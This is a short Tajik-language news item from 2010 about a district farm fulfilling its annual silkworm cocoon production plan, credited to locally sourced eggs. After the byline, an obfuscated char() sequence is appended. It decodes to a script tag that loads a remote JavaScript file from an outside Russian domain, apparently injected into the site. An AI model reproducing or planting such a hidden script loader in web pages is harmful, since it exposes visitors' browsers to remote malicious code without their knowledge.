5.06.2010
Нақшаи истеҳсоли пилла иҷро шуд
Кирмакпарварони АХД ба номи Раҳбар Қосимови ноҳияи Б.Ғафуров аз иҷрои нақшаи солонаи истеҳсоли пилла сарбаландона баромаданд. Бино ба гуфти раси раёсати хоҷагӣ Аҳмадҷон Шукуров соли равон кирмакпарварони хоҷаги 100 қуттӣ кирмакро барои парвариш ба зимма гирифтаанд. Дар рафти парвариш онҳо ба технологияи парвариши кирмак риоя карданд ва дар натиҷа ба муваффақият нооил гардиданд. Ба ҳисоби миёна аз ҳар қуттӣ кирмак 52 килограммӣ ашёи пурқиммати саноати ба даст оварда шуд, ки дар миқёси ноҳия ин нишондиҳанда беҳтарин аст. Аҳмадҷон Шукуров изҳор дошт, ки яке аз омилҳои асосии иҷроиши нақша ин тухмии хушсифати кирмак аст. Дар ҳолате, ки кулли хоҷагиҳои ноҳияро КВД «Пилла»-и ҷумҳурӣ бо тухмӣ таъмин карда бошад, хоҷагии мазкур, АХД «Хоҷабоқирғон» ва ба номи П.Бобокалонов аз тухмии маҳаллӣ истифода карданд.
М. Мақсудов
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)baeee61c73b278477ce1e7e047d1ae41.js" type="text/javascript">

